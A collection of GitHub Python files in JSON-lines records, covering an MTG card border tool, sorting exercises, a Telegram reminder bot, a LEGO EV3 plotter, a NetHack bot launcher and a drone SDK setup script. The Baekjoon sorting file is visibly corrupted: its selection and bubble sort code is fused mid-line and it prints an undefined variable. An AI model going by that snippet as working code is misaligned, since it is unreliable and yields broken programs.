== 749:\r\n for b in range(33):\r\n newX = x+34+b\r\n newPix[newX, y+32] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[34, y]\r\n newPix[x, y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[781, y]\r\n newPix[815-x, y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[34, 1109-y]\r\n newPix[x, 1109-y] = fillColor\r\n\r\n for y in range(33):\r\n for x in range(34):\r\n fillColor = newPix[782, 1109-y]\r\n newPix[815-x, 1109-y] = fillColor\r\n\r\ndef main(filename):\r\n global im, pix\r\n im = Image.open('images/'+filename)\r\n pix = im.load()\r\n\r\n CornerFill()\r\n\r\n global newImage, newPix\r\n newImage = Image.new('RGB', (816, 1110))\r\n newPix = newImage.load()\r\n\r\n boarderFill()\r\n\r\n newImage.save('images/' + filename)\r\n\r\ndef BSM(): #integration for main\r\n toFolder = os.listdir('images')\r\n for num in tqdm(range(len(toFolder)), desc='Creating boarders...'):\r\n main(toFolder[num])","repo_name":"Chadhendrixs/MtgProxyCreator","sub_path":"modules/cardBSM.py","file_name":"cardBSM.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13676982876","text":"'''\n 문제 : N개의 수가 주어졌을 때, 이를 오름차순으로 정렬하는 프로그램을 작성하시오.\n 입력\n 1) 첫째 줄 - 수의 개수(1<=N<=1000)\n 2) 둘째 줄부터~ - 숫자(절댓값이 1000 이하인 정수), 중복 X\n\n 해결법\n 1) Seletion sort - O(n²)\n 2) Bubble sort - O(n²)\n'''\n\nfrom sys import stdin\n\n#선택정렬 구현\ndef selection_sort(numList):\n print('Selection Sort : ',end='')\n for i in range(1, len(numList)):\n key = numList[i]\n j=i\n\n while j>0 and key numList[j+1]:\n numList[j], numList[j+1] = numList[j+1], numList[j]\n\n print(numList)\n\n\n\n\ndef solution():\n n = int(stdin.readline())\n numList = [0]*n\n\n for i in range(n):numList[i] = int(stdin.readline())\n\n # bubble_sort(numList)\n # selection_sort(numList)\n\n for n in result:\n print(n)\n\nsolution()","repo_name":"junseokseo-KR/pythonAlgorithm","sub_path":"venv/src/codeAlgorithm/baekjoon/정렬/2750_수정렬하기1.py","file_name":"2750_수정렬하기1.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35375983457","text":"\"\"\"\nCombine all the results into a single table\n\"\"\"\nimport pandas as pd\nimport glob\nfrom os import path\n\n\nfiles = glob.glob(\"data/*-mask-chr*.csv\")\noutfile = 'data/densities-all.csv'\n\ndef load_file(fname):\n # was vcf generated before of after mask filter?\n bsn = path.basename(fname)\n mask = bsn.split('-')[0]\n dat = pd.read_csv(fname)\n dat['mask_filter'] = mask\n return dat\n\ndensities = [load_file(x) for x in files]\ndensities = pd.concat(densities)\ndensities.to_csv(outfile, index=False)\n","repo_name":"santiago1234/mxb-genomes","sub_path":"analysis-doc/210428-VisualizePositionOfVariants/collect-results.py","file_name":"collect-results.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"40185988683","text":"import asyncio\nimport aiohttp\nfrom fpl import FPL\nfrom app import db\nfrom models import Player\nfrom stats import get_player_positions\n\nid_to_team_name = {\n 1 : \"Arsenal\",\n 2 : \"Aston Villa\",\n 3 : \"Brighton\",\n 4 : \"Burnley\",\n 5 : \"Chelsea\",\n 6 : \"Crystal Palace\",\n 7 : \"Everton\",\n 8 : \"Fulham\",\n 9 : \"Leicester\",\n 10 : \"Leeds\",\n 11 : \"Liverpool\",\n 12 : \"Manchester City\",\n 13 : \"Manchester United\",\n 14 : \"Newcastle United\",\n 15 : \"Sheffield United\",\n 16 : \"Southampton\",\n 17 : \"Tottenham\",\n 18 : \"West Bromwich Albion\",\n 19 : \"West Ham\",\n 20 : \"Wolverhampton Wanderers\"\n}\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n fpl = FPL(session)\n await get_player_positions(fpl)\n\n \n\n\nasyncio.run(main())","repo_name":"Jodldokus/fpl-radar","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29397673738","text":"import json\n\nfrom aiogram.types import Message\nfrom aiogram.types.reply_keyboard import ReplyKeyboardRemove\n\nfrom bot.handlers.default.donate import donate\nfrom bot.handlers.default.help import help\nfrom bot.handlers.default.reminders.new_reminder import new_reminder\nfrom bot.handlers.default.reminders.reminders_list import reminders_list\nfrom bot.handlers.default.referral import get_referral_link\nfrom bot.handlers.default.timers.timers_list import timer_menu\nfrom bot.keyboards.default.set_menu import set_menu\nfrom loader import dp, bot, _\n\n\n@dp.message_handler(commands=\"menu\")\nasync def menu(message: Message, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = True\n settings[\"last_kb\"] = \"main\"\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Выбери действие из меню 👇\"), reply_markup=set_menu(user))\n await message.delete()\n\n\n@dp.message_handler(commands=\"remove_menu\")\nasync def remove_menu(message: Message, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = False\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Клавиатура убрана. Вызвать ее можно командой /menu\"), reply_markup=set_menu(user))\n await message.delete()\n\n\n@dp.message_handler(text=\"➕ Новое напоминание\", state=\"*\")\n@dp.message_handler(text=\"➕ New reminder\", state=\"*\")\n@dp.message_handler(text=\"➕ Нове нагадування\", state=\"*\")\nasync def _new_reminder(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await new_reminder(message, state, user)\n\n\n@dp.message_handler(text=\"📝 Список напоминаний\", state=\"*\")\n@dp.message_handler(text=\"📝 Reminder List\", state=\"*\")\n@dp.message_handler(text=\"📝 Список нагадувань\", state=\"*\")\nasync def _reminders_list(message: Message, user, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await reminders_list(message, user)\n\n\n@dp.message_handler(text=\"⏳ Таймер\", state=\"*\")\n@dp.message_handler(text=\"⏳ Timer\", state=\"*\")\n@dp.message_handler(text=\"⏳ Таймер\", state=\"*\")\nasync def _timer(message: Message, user, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await timer_menu(message, user)\n\n\n@dp.message_handler(text=\"💵 Донат\", state=\"*\")\n@dp.message_handler(text=\"💵 Donat\", state=\"*\")\nasync def _donate(message: Message, state):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await donate(message, state)\n\n\n@dp.message_handler(text=\"❔ Помощь по командам\", state=\"*\")\n@dp.message_handler(text=\"❔ Help by commands\", state=\"*\")\n@dp.message_handler(text=\"❔ Допомога по командам\", state=\"*\")\nasync def _help(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await help(message, user)\n\n\n@dp.message_handler(text=\"🔗 Реферальная ссылка\", state=\"*\")\n@dp.message_handler(text=\"🔗 Referral link\", state=\"*\")\n@dp.message_handler(text=\"🔗 Реферальне посилання\", state=\"*\")\nasync def referral(message: Message, state, user):\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n await get_referral_link(message, user)\n\n\n@dp.message_handler(text=\"🛠 Админ-клавиатура\", state=\"*\")\n@dp.message_handler(text=\"🛠 Admin keyboard\", state=\"*\")\n@dp.message_handler(text=\"🛠 Адмін-клавіатура\", state=\"*\")\nasync def _reminders_list(message: Message, state, user):\n settings = json.loads(user.settings)\n\n settings[\"kb_enabled\"] = True\n settings[\"last_kb\"] = \"admin\"\n\n user.settings = json.dumps(settings)\n user.save()\n\n await message.answer(_(\"Выбери действие из меню 👇\"), reply_markup=set_menu(user))\n async with state.proxy() as data:\n if 'message' in data:\n for mes in data['message']:\n try:\n await bot.delete_message(message.chat.id, mes)\n except:\n continue\n\n await state.finish()\n","repo_name":"RomanKuschanow/Lite_task_bot_aiogram","sub_path":"bot/handlers/default/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34629645816","text":"idade = 0\n\nwhile True:\n try:\n idade = int(input(\"Idade: \"))\n if(idade < 0 or idade > 150):\n print(\"Idade fora da faixa! (Deve ser entre 0 e 150 anos)\")\n continue\n\n break\n except ValueError:\n print(\"Idade inválida! Digite um número!!\")\n\n\nprint(idade)","repo_name":"JardelBrandon/Algoritmos_e_Programacao","sub_path":"Atividades/Roteiro 12 - Exceções - Exemplo/Programa exemplo/imprime_info.py","file_name":"imprime_info.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27191752609","text":"import os\nimport click\nfrom bvareader import reader\nfrom bvareader.exporter import save_csv\nfrom bvareader.preprocessing import prepare_position\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True), nargs=1)\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_data(path, output):\n \"\"\"This script opens given path and outputs a preprocessed\n xml files including positions, measures, phases and sync times\"\"\"\n output_path = create_output_path(path, output)\n bva_prepare(path, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_positions(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with positions\"\"\"\n output_path = create_output_path(path, output) + 'positions'\n\n pd_bva = reader.read_positions(path)\n pd_bva2 = prepare_position(pd_bva)\n\n save_csv(pd_bva, output_path + '_full.csv')\n save_csv(pd_bva2, output_path + '.csv')\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_sync_times(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with sync times\"\"\"\n output_path = create_output_path(path, output) + 'sync_times.csv'\n pd_sync = reader.read_sync_times(path)\n reader.save_csv(pd_sync, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_phases(path, output):\n \"\"\"This script takes given bva file and outputs\n preprocessed csv files with phases\"\"\"\n output_path = create_output_path(path, output) + 'phases.csv'\n pd_phases = reader.read_phases(path)\n save_csv(pd_phases, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='', help='name of the output files')\ndef process_bva_measure_start_stop(path, output):\n \"\"\"This script takes given bva xml file and outputs\n preprocessed csv files with measure starts and stops\"\"\"\n output_path = create_output_path(path, output) + 'measure_start_stop.csv'\n pd_start_stop = reader.read_new_measure_start_stop(path)\n save_csv(pd_start_stop, output_path)\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.option('-o', '--output', default='settings', help='name of the output files')\ndef xml_settings_to_csv(path, output):\n # TODO - issue with comman with single instead of double quotes\n output_path = create_output_path(path, output) + 'settings.csv'\n pd_settings = reader.read_new_settings(path)\n save_csv(pd_settings, output_path)\n\n\ndef create_output_path(path, output):\n output_prefix = '' if output == '' else output + '_'\n output_path = os.path.dirname(os.path.realpath(path))\n return(os.path.join(output_path, output_prefix))\n\n\ndef bva_prepare(path, output_path):\n if reader.old_or_new(path) == 'new':\n try:\n pd_phases = reader.read_phases(path)\n save_csv(pd_phases, output_path + 'phases.csv')\n pd_start_stop = reader.read_new_measure_start_stop(path)\n save_csv(pd_start_stop, output_path + 'measure_start_stop.csv')\n except(Exception):\n print(\"Could not process start and stop due to non appropriate data\")\n pass\n if reader.old_or_new(path) == 'old':\n try:\n pd_keys = reader.read_keypresses(path)\n save_csv(pd_keys, output_path + 'keypresses.csv')\n pd_lasers = reader.read_lasers(path)\n save_csv(pd_lasers, output_path + 'lasers.csv')\n pd_settings = reader.read_old_settings(path)\n save_csv(pd_settings, output_path + 'settings.csv')\n except(Exception):\n print('Could Not process data')\n pass\n pd_bva = reader.read_positions(path)\n save_csv(pd_bva, output_path + 'positions_unprocessed.csv')\n pd_bva_prep = prepare_position(pd_bva)\n save_csv(pd_bva_prep, output_path + 'positions_processed.csv')\n pd_sync = reader.read_sync_times(path)\n save_csv(pd_sync, output_path + 'sync_times.csv')\n","repo_name":"hejtmy/bvareader","sub_path":"bvareader/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43471067708","text":"import math\nimport time\nfrom time import sleep\n\nfrom ev3dev.ev3 import *\nfrom ev3dev.auto import OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D\n\nfrom draw_action import DrawAction\n\nprint(\"Loading libaries completed. Time to relax!\")\n\nclass Plott3r:\n def __init__(self):\n\n self.touch_sensor = TouchSensor()\n assert self.touch_sensor.connected\n\n self.rail_motor = LargeMotor(OUTPUT_A)\n assert self.rail_motor.connected\n\n self.paper_motor = LargeMotor(OUTPUT_B)\n assert self.paper_motor.connected\n\n self.pen_motor = MediumMotor(OUTPUT_C)\n assert self.pen_motor.connected\n\n # List of draw commands\n self.draw_list = []\n\n self.motors_calibrated = False\n self.x_units_to_cm = 1# / 1.1\n self.y_units_to_cm = 1# / 1.2\n\n self.is_drawing = False\n self.is_busy = False\n self.is_pen_up = False\n self.current_draw_Item = None\n self.prev_draw_Item = None\n self.pen_is_adjustable = True\n\n self.rail_motor_max_speed = 100\n self.paper_motor_max_speed = 100\n self.pen_motor_max_speed = 100\n\n self.all_motor_speed_mutiplier = 10\n\n def reset_motors(self):\n self.reset_rail_motor()\n self.reset_paper_motor()\n self.reset_pen_motor()\n\n def reset_rail_motor(self):\n self.rail_motor.reset()\n self.rail_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.rail_motor.speed_sp = 600\n self.rail_motor.polarity = Motor.POLARITY_INVERSED\n self.rail_motor_max_speed = self.rail_motor.max_speed\n self.rail_motor.position_p = 80000\n self.rail_motor.position_i = 400\n self.rail_motor.position_d = 0\n self.rail_motor.speed_p = 1000\n self.rail_motor.speed_i = 60\n self.rail_motor.speed_d = 0\n\n def reset_paper_motor(self):\n self.paper_motor.reset()\n self.paper_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.paper_motor.speed_sp = 600\n self.paper_motor.polarity = Motor.POLARITY_INVERSED\n self.paper_motor_max_speed = self.paper_motor.max_speed\n self.paper_motor.position_p = 80000\n self.paper_motor.position_i = 400\n self.paper_motor.position_d = 0\n self.paper_motor.speed_p = 1000\n self.paper_motor.speed_i = 60\n self.paper_motor.speed_d = 0\n\n def reset_pen_motor(self):\n self.pen_motor.reset()\n self.pen_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.pen_motor.speed_sp = 600\n self.pen_motor_max_speed = self.pen_motor.max_speed\n\n def force_stop(self):\n self.draw_list = []\n self.current_draw_Item = None\n self.prev_draw_Item = None\n self.pen_up()\n self.rail_motor.stop()\n self.paper_motor.stop()\n self.is_drawing = False\n self.is_busy = False\n\n def switch_pen_state(self):\n if self.pen_is_adjustable is False:\n self.pen_is_adjustable = True\n self.pen_motor.stop_action = Motor.STOP_ACTION_BRAKE\n else:\n self.pen_is_adjustable = True\n self.pen_motor.stop_action = Motor.STOP_ACTION_HOLD\n\n def pen_up(self):\n if self.is_pen_up is False:\n self.is_pen_up = True\n self.pen_motor.run_to_abs_pos(position_sp=100, speed_sp=600)\n\n def pen_down(self):\n if self.is_pen_up is True:\n self.is_pen_up = False\n self.pen_motor.run_to_abs_pos(position_sp=0, speed_sp=600)\n\n def draw(self, draw_list):\n if self.is_busy:\n return\n self.is_busy = True\n\n Sound.speak('Drawing Started').wait()\n\n self.draw_list = draw_list\n self.draw_list.reverse()\n self.current_draw_Item = self.draw_list.pop()\n\n self.start_draw()\n self.pen_up()\n\n self.is_busy = False\n Sound.speak('Drawing Finished').wait()\n\n def draw_next_item(self):\n if len(self.draw_list) > 0:\n\n if (self.current_draw_Item.t == DrawAction.PEN_MOVE):\n self.prev_draw_Item = DrawAction(self.current_draw_Item.t, self.current_draw_Item.x,\n self.current_draw_Item.y)\n self.current_draw_Item = self.draw_list.pop()\n else:\n self.prev_draw_Item = None\n self.current_draw_Item = None\n\n def start_draw(self):\n print (\"Start Drawing\")\n while self.current_draw_Item is not None:\n if self.current_draw_Item.t == DrawAction.PEN_UP:\n self.pen_up()\n while self.pen_motor.position < 99:\n time.sleep(0.1)\n\n elif self.current_draw_Item.t == DrawAction.PEN_DOWN:\n self.pen_down()\n while self.pen_motor.position > 2:\n sleep(0.1)\n\n elif self.current_draw_Item.t == DrawAction.PEN_MOVE:\n\n to_x = math.floor(self.current_draw_Item.x * self.x_units_to_cm)\n to_y = math.floor(self.current_draw_Item.y * self.y_units_to_cm)\n\n ratio = 1\n dcsp = 30\n x_dcsp = dcsp\n y_dcsp = dcsp\n\n if self.prev_draw_Item is not None:\n dx = abs(self.current_draw_Item.x - self.prev_draw_Item.x)\n dy = abs(self.current_draw_Item.y - self.prev_draw_Item.y)\n else:\n dx = abs(to_x - self.rail_motor.position)\n dy = abs(to_y - self.paper_motor.position)\n\n if dx > 0 and dx > 0:\n ratio = dy / dx\n\n if ratio > 1: # y is longer\n x_dcsp = dcsp / ratio\n if (x_dcsp < 10):\n x_dcsp = 10\n y_dcsp = 10 * ratio\n\n elif 1 > ratio > 0: # x is longer\n y_dcsp = dcsp / ratio\n if (y_dcsp < 10):\n y_dcsp = 10\n x_dcsp = 10 * ratio\n\n x_dcsp = math.ceil(max(0, (min(100, x_dcsp))))\n y_dcsp = math.ceil(max(0, (min(100, y_dcsp))))\n\n print (\"CX:\"+ str(self.current_draw_Item.x)+ \"CY:\"+ str(self.current_draw_Item.y))\n if self.prev_draw_Item is not None:\n print (\"PX:\"+ str(self.prev_draw_Item.x)+\"PY:\"+ str(self.prev_draw_Item.y))\n\n x_completed = True\n y_completed = True\n\n if dx > 0:\n x_completed = False\n self.rail_motor.run_to_abs_pos(position_sp=to_x, speed_sp=x_dcsp*self.all_motor_speed_mutiplier)\n\n if dy > 0:\n y_completed = False\n self.paper_motor.run_to_abs_pos(position_sp=to_y, speed_sp=y_dcsp*self.all_motor_speed_mutiplier)\n\n start_time = time.time()\n while self.current_draw_Item is not None and (x_completed is False or y_completed is False):\n\n if x_completed is False:\n dx = abs(to_x - self.rail_motor.position)\n if dx <= 1:\n x_completed = True\n self.rail_motor.stop()\n\n if y_completed is False:\n dy = abs(to_y - self.paper_motor.position)\n if dy <= 1:\n y_completed = True\n self.paper_motor.stop()\n\n if time.time() - start_time > 15:\n break\n\n sleep(0.1)\n\n self.draw_next_item()\n\n def manual_paper_feed_inc(self, direction):\n self.paper_motor.run_forever(speed_sp=400 * direction)\n\n def manual_paper_feed_inc_stop(self):\n self.paper_motor.stop()\n\n def manual_paper_feed(self, direction):\n self.paper_motor.run_forever(speed_sp=400 * direction)\n\n def stop_paper_feed(self):\n self.reset_paper_motor()\n\n def manual_move_x(self, direction):\n self.rail_motor.run_forever(speed_sp=600 * direction)\n\n def manual_stop_x(self):\n self.rail_motor.stop()\n\n def switch_pen_pos(self):\n if self.is_pen_up is True:\n self.pen_down()\n else:\n self.pen_up()\n\n def calibrate(self):\n if self.is_busy:\n return\n self.is_busy = True\n\n Sound.speak('Calibrating Motor Positions').wait()\n\n self.rail_motor.polarity = Motor.POLARITY_INVERSED\n self.rail_motor.run_forever(speed_sp=-500)\n\n wait_for_button_press = True\n while wait_for_button_press:\n if self.touch_sensor.value():\n wait_for_button_press = False\n self.rail_motor.stop()\n self.reset_rail_motor()\n self.rail_motor.run_to_abs_pos(position_sp=100, speed_sp=600)\n\n self.motors_calibrated = True\n self.is_busy = False\n\n Sound.speak('Calibrating Motor Positions Completed').wait()\n\n return \"Calibration Completed\"\n\n def set_pen_position(self):\n self.pen_motor.reset()\n self.pen_motor.stop_action = Motor.STOP_ACTION_BRAKE\n self.pen_motor.speed_sp = 600\n\n def feed_paper(self):\n\n if self.is_busy:\n return\n self.is_busy = True\n\n timer = 0\n max_time = 1000\n\n self.paper_motor.run_forever(speed_sp=-400)\n\n waiting_paper = True\n while waiting_paper:\n timer += 1\n if timer > max_time:\n waiting_paper = False\n Sound.speak('Loaded').wait()\n self.is_busy = False\n return\n\n self.paper_motor.run_to_rel_pos(position_sp=-40, speed_sp=500)\n sleep(0.5)\n\n self.reset_paper_motor()\n\n self.is_busy = False\n Sound.speak('Paper Feeded').wait()\n","repo_name":"RedNicStone/plott3r","sub_path":"Programms/Plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73369474647","text":"import sys\r\nimport json\r\nimport time\r\nimport argparse\r\nimport gym\r\nfrom modules import general_modules, reach_modules, secret_passage_modules\r\nfrom core import Saver, GameWhisperer, DungeonWalker, main_logic\r\nfrom nle import nethack\r\n\r\ndef start_bot(env, saver, filename):\r\n with open('config.json', 'r') as f:\r\n config = json.load(f)\r\n\r\n print(\"\\nLuckyMera-v1.0 is looking for the Amulet of Yendor on the map ...\\n\")\r\n\r\n exec_mode = config['fast_mode']\r\n mode = False\r\n if exec_mode == \"on\":\r\n mode = True\r\n print(\"\\nFast_Mode : ON\")\r\n elif exec_mode == \"off\":\r\n print(\"\\nFast_Mode : OFF\")\r\n else:\r\n print(\"\\nFast_Mode can only be \\\"on\\\" or \\\"off\\\" -> value set to default : OFF\")\r\n time.sleep(0.5)\r\n\r\n games_number = 100\r\n try:\r\n games_number = int(config['attempts'])\r\n print(\"Attempts : \", games_number)\r\n except:\r\n print(\"Attempts must be an int value -> value set to default : \", games_number)\r\n games_number = 100\r\n time.sleep(0.5)\r\n\r\n game_interface = GameWhisperer(env, mode, saver, filename)\r\n walk_logic = DungeonWalker(game_interface)\r\n\r\n skill_prio = config['skill_prio_list']\r\n skill_modules_map = {}\r\n for i in range(0, len(skill_prio)):\r\n skill_name = skill_prio[i]\r\n \r\n if hasattr(general_modules, skill_name): skill_class = getattr(general_modules, skill_name)\r\n elif hasattr(reach_modules, skill_name): skill_class = getattr(reach_modules, skill_name)\r\n elif hasattr(secret_passage_modules, skill_name): skill_class = getattr(secret_passage_modules, skill_name)\r\n else: sys.exit('skill not found')\r\n\r\n skill_modules_map[skill_name] = skill_class(walk_logic, game_interface, skill_name)\r\n print(skill_name)\r\n time.sleep(0.1)\r\n\r\n print(\"\\nLuckyMera-v.10 is ready for YASD ...\")\r\n print(\"\\n\\n\")\r\n time.sleep(1)\r\n\r\n return walk_logic, game_interface, skill_prio, skill_modules_map, games_number\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n '--env_name',\r\n type=str,\r\n default='NetHackChallenge-v0',\r\n help='The environment to use'\r\n )\r\n parser.add_argument(\r\n '--inference',\r\n dest='training',\r\n action='store_false',\r\n help='Use the framework to actually play the game'\r\n )\r\n parser.add_argument(\r\n '--observation_keys',\r\n dest='observation_keys',\r\n nargs='+',\r\n default=None,\r\n help='Specify the observation space of nle'\r\n )\r\n \r\n #### DATASET CREATION PARAMETERS ####\r\n dataset_creation_group = parser.add_argument_group('dataset creation')\r\n dataset_creation_group.add_argument(\r\n '--create_dataset',\r\n dest='create_dataset',\r\n action='store_true',\r\n help='Use the bot to generate a dataset of trajectories'\r\n )\r\n dataset_creation_group.add_argument(\r\n '--language_mode',\r\n dest='language_mode',\r\n action='store_true',\r\n help='Save trajectories in language mode, using the nle_language_wrapper'\r\n )\r\n dataset_creation_group.add_argument(\r\n '--keys_to_save',\r\n dest='keys_to_save',\r\n nargs='+',\r\n default=None,\r\n help='Specify the observation keys to save'\r\n )\r\n dataset_creation_group.add_argument(\r\n '--filename',\r\n type=str,\r\n default='saved_trajectories',\r\n help='The path where to save trajectories' \r\n )\r\n\r\n #### TRAINING PARAMETERS ####\r\n training_group = parser.add_argument_group('training mode')\r\n training_group.add_argument(\r\n '--training',\r\n dest='training',\r\n action='store_true',\r\n help='Train a neural model'\r\n )\r\n training_group.add_argument(\r\n '--training_alg',\r\n type=str,\r\n default=None,\r\n help='Select the training algorithm to use'\r\n )\r\n training_group.add_argument(\r\n '--dataset',\r\n type=str,\r\n default='saved_trajectories.pkl',\r\n help='Path to the dataset for the training process'\r\n )\r\n training_group.add_argument(\r\n '--batch_size',\r\n type=int,\r\n default=32,\r\n help='Size of the batch in the training process'\r\n )\r\n training_group.add_argument(\r\n '--checkpoint',\r\n type=str,\r\n default='saved_model',\r\n help='Path to save the trained model'\r\n )\r\n training_group.add_argument(\r\n '--cuda',\r\n dest='cuda',\r\n action='store_true',\r\n help='Use cuda for training'\r\n )\r\n training_group.add_argument(\r\n '--no_cuda',\r\n dest='cuda',\r\n action='store_false',\r\n help='Do not use cuda for training'\r\n )\r\n parser.set_defaults(cuda=True)\r\n training_group.add_argument(\r\n '--seed',\r\n type=int,\r\n default=42,\r\n help='Random seed'\r\n )\r\n training_group.add_argument(\r\n '--learning_rate',\r\n type=float,\r\n default=1e-5,\r\n help='Learning rate of the training process'\r\n )\r\n training_group.add_argument(\r\n '--scheduler_gamma',\r\n type=float,\r\n default=0.7,\r\n help='The gamma parameter of the scheduler of the training process'\r\n )\r\n training_group.add_argument(\r\n '--epochs',\r\n type=int,\r\n default=5,\r\n help='Number of epochs'\r\n )\r\n parser.set_defaults(training=False)\r\n\r\n flags = parser.parse_args()\r\n env_name = flags.env_name\r\n create_dataset = flags.create_dataset\r\n language_mode = flags.language_mode\r\n keys_to_save = flags.keys_to_save\r\n filename = flags.filename\r\n training_mode = flags.training\r\n training_alg_name = flags.training_alg\r\n dataset = flags.dataset\r\n batch_size = flags.batch_size\r\n checkpoint = flags.checkpoint\r\n observation_keys = flags.observation_keys\r\n\r\n training_params = {}\r\n training_params['use_cuda'] = flags.cuda\r\n print(f'\\n\\n\\n\\nLuckyMera using cuda: {flags.cuda}')\r\n training_params['seed'] = flags.seed\r\n training_params['learning_rate'] = flags.learning_rate\r\n training_params['scheduler_gamma'] = flags.scheduler_gamma\r\n training_params['epochs'] = flags.epochs\r\n\r\n print(f'training mode: {training_mode}')\r\n print(f'obs_keys: {observation_keys}')\r\n\r\n if 'MiniHack' in env_name: import minihack\r\n\r\n # use the complete action space also for minihack envs\r\n if observation_keys:\r\n env = gym.make(env_name, observation_keys=observation_keys, actions=nethack.ACTIONS)\r\n #if no observation_keys are specified, all the keys are included\r\n else: env = gym.make(env_name, actions=nethack.ACTIONS)\r\n \r\n if training_mode:\r\n import training\r\n if not training_alg_name:\r\n raise SystemError('No training algorithm specified')\r\n if hasattr(training, training_alg_name):\r\n training_alg_class = getattr(training, training_alg_name)\r\n print(f'Using {training_alg_name} for training')\r\n else:\r\n raise SystemError(f'The training algorithm {training_alg_name} is not implemented in training.py')\r\n\r\n training_alg = training_alg_class(training_params, env, dataset, batch_size, checkpoint)\r\n training_alg.train()\r\n else:\r\n if create_dataset and not filename:\r\n raise SystemError('no filename to store trajectories')\r\n if language_mode and not create_dataset:\r\n raise SystemError('language mode selected, but create_dataset is false')\r\n if create_dataset and not keys_to_save:\r\n raise SystemError('keys_to_save equal to None - No keys to save')\r\n \r\n\r\n if language_mode:\r\n from nle_language_wrapper import NLELanguageWrapper\r\n env = NLELanguageWrapper(env, use_language_action=False)\r\n if create_dataset: saver = Saver(keys_to_save, filename)\r\n else: saver = None\r\n\r\n dungeon_walker, game, logic, skill_map, attempts = start_bot(env, saver, filename)\r\n main_logic(dungeon_walker, game, logic, skill_map, attempts)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Pervasive-AI-Lab/LuckyMera","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"43216289742","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pioneer_sdk',\n packages=['pioneer_sdk', 'pioneer_sdk.mavsub', 'pioneer_sdk.tools'],\n include_package_data=True,\n version='0.5.3',\n license='MIT',\n description='Programming tools for programming geoscan pioneer drone',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='geoscan',\n author_email='info@geoscan.aero',\n url='https://github.com/geoscan/pioneer_sdk',\n keywords=['mavlink', 'pioneer', 'geoscan'],\n setup_requires=['wheel'],\n install_requires=[\n 'pymavlink==2.4.37',\n 'pyserial==3.5',\n 'future==0.18.3',\n 'numpy',\n 'opencv-contrib-python==4.7.0.72'\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n 